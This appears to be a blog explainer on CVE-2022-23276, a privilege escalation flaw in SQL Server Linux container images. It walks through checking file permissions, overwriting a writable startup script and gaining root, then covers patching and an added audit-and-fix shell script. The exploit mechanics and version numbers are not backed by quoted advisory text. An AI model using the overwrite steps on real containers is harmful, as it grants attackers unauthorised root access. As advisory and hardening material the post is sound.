In the world of cloud and containerized deployments, Microsoft’s SQL Server for Linux has gained traction among developers and organizations that want the power of SQL Server in more flexible environments. But security is always a top concern, and in early 2022, a critical issue—CVE-2022-23276—was discovered, exposing SQL Server in Linux containers to the risk of elevation of privilege. In this long read, we’ll break down what happened, how the exploit works, and what you can do to stay protected. We’ll use simple language and code snippets to illustrate the vulnerability, and provide direct links to official references.

What Is CVE-2022-23276?

CVE-2022-23276 is an Elevation of Privilege (EoP) vulnerability affecting SQL Server’s Linux container images. Specifically, anyone with local access to a container running SQL Server could escalate their privileges, possibly gaining unauthorized access and control.

CVSS Score: 8.8 (High)  
Affected versions:

- SQL Server 2017 for Linux containers, versions prior to 14.0.3456.2 (CU30)

Official Microsoft Advisory:  
Microsoft Security Update Guide - CVE-2022-23276

How Does the Vulnerability Work?

Linux containers usually isolate processes, but sometimes misconfigurations or legacy practices can leak privileges. In the vulnerable versions, the way SQL Server’s container startup script handled file permissions allowed for accidental permission escalation.

Key issue:  
The entrypoint script used by the SQL Server Linux container image could be exploited to execute commands as root when the container was launched.

- Entry point scripts are writable by non-root users (e.g. group or world write permissions).
- An attacker who gains access inside the container could replace or modify these scripts, then restart the container, running arbitrary code as root.

1. Identify the Vulnerable Script

The SQL Server Docker image often uses an entrypoint like /opt/mssql/bin/permissions_check.sh.

Check the permissions:

ls -l /opt/mssql/bin/permissions_check.sh

Output may look like:

-rwxrwxrwx 1 mssql mssql 2925 Jan 1  2022 /opt/mssql/bin/permissions_check.sh

Notice the global write permission (-rwxrwxrwx).

2. Overwrite the Script

Inside the running container, the attacker overwrites the script:

echo 'id > /tmp/hacked_by_cve23276.txt' > /opt/mssql/bin/permissions_check.sh

3. Restart the SQL Server Process

When the container or process restarts, the vulnerable script will be executed with root privileges!

4. Check the Result

Now the attacker reads the output:

cat /tmp/hacked_by_cve23276.txt

Expected output:

uid=0(root) gid=0(root) groups=0(root)

This means arbitrary code execution as root—the ultimate EoP.

Exploit Details

What does this mean?

Conditions required:

- The attacker must have access inside the container or the ability to alter its contents (e.g., via web shells, SQL injection with file write, etc.).
- Restarting the container or the SQL Server process may be required.

Notably:  
This is less about a buffer overflow or low-level bug—it's about bad permissions on critical files in the image.

Mitigation

Microsoft Patch:  
Microsoft fixed this issue by updating permissions on critical scripts and changing their container user model. Upgrade to the latest CU (Cumulative Update):

- SQL Server 2017: Version 14.0.3456.2 (CU30) or later

Download fixed images:  
- SQL Server 2019 Linux container tags
- SQL Server 2017 Linux container tags

Audit your images for misconfigurations:

find /opt/mssql/bin -perm /022 -type f

This lists any files in the bin folder that are world- or group-writable.
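The one-line find above can be turned into a repeatable audit-and-remediate check for the permission problem described in this post (world- or group-writable startup scripts). The following script is an added example written for this post; it is not Microsoft's code and not part of the SQL Server container image. It assumes a POSIX shell with find, chmod and mktemp, and the file names it creates in demo() are constructed stand-ins for the real scripts under /opt/mssql/bin.

```shell
#!/bin/sh
# Added example (not Microsoft's or the image's own code): audit a directory
# such as /opt/mssql/bin for group- or world-writable files and strip those
# bits. The paths and file names in demo() are constructed for illustration.

# Print every regular file under $1 whose mode has group-write (020) or
# other-write (002) set. "-perm /022" matches if ANY of those bits is set.
audit_writable() {
    find "$1" -type f -perm /022 2>/dev/null | sort
}

# Return 0 when the directory is clean, 1 when loosely permissioned files exist.
check_dir() {
    bad=$(audit_writable "$1")
    if [ -n "$bad" ]; then
        printf 'Group/world-writable files under %s:\n%s\n' "$1" "$bad"
        return 1
    fi
    printf 'No group/world-writable files under %s\n' "$1"
    return 0
}

# Remediate: remove the group and other write bits from each offending file,
# leaving owner permissions untouched (a 0777 script becomes 0755).
fix_writable() {
    audit_writable "$1" | while IFS= read -r f; do
        chmod go-w "$f"
    done
}

# Stand-alone demo: build a throwaway fixture that mimics the vulnerable layout,
# run the audit, fix the files, and audit again.
demo() {
    tmp=$(mktemp -d)
    printf '#!/bin/sh\nexit 0\n' > "$tmp/permissions_check.sh"
    chmod 0777 "$tmp/permissions_check.sh"   # constructed: the bad state
    printf '#!/bin/sh\nexit 0\n' > "$tmp/start.sh"
    chmod 0755 "$tmp/start.sh"               # constructed: the expected state
    check_dir "$tmp" || true                 # reports permissions_check.sh
    fix_writable "$tmp"
    check_dir "$tmp"                         # now clean
    rm -rf "$tmp"
}

demo
```

In a CI pipeline or an admission check you would run check_dir against the unpacked image (or exec it inside a running container) and fail the build when it returns 1; fix_writable is the in-place remedy for images you build yourself, while for the official image the fix is to pull a patched tag.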

References & Further Reading

- Microsoft Security Update Guide - CVE-2022-23276
- NIST NVD Entry for CVE-2022-23276
- Official SQL Server Linux Docker Image
- SQL Server Release Notes

Conclusion

CVE-2022-23276 was a classic example of privileges accidentally leaking in containerized environments. The fix was simple—set correct file permissions and upgrade your images! But as containerization spreads, it’s a reminder to review base images, scripts, and deployment practices for possible privilege escalation. Patch your SQL Server Linux containers, keep your images up to date, and always check file permissions!

If you want to check your setup today, go through the examples in this post, and if in doubt, pull the latest Microsoft container images so your data stays safe.


Got questions about this vulnerability or need more help hardening your SQL Server containers? Let me know in the comments!

Timeline

Published on: 02/09/2022 17:15:00 UTC
Last modified on: 02/14/2022 18:40:00 UTC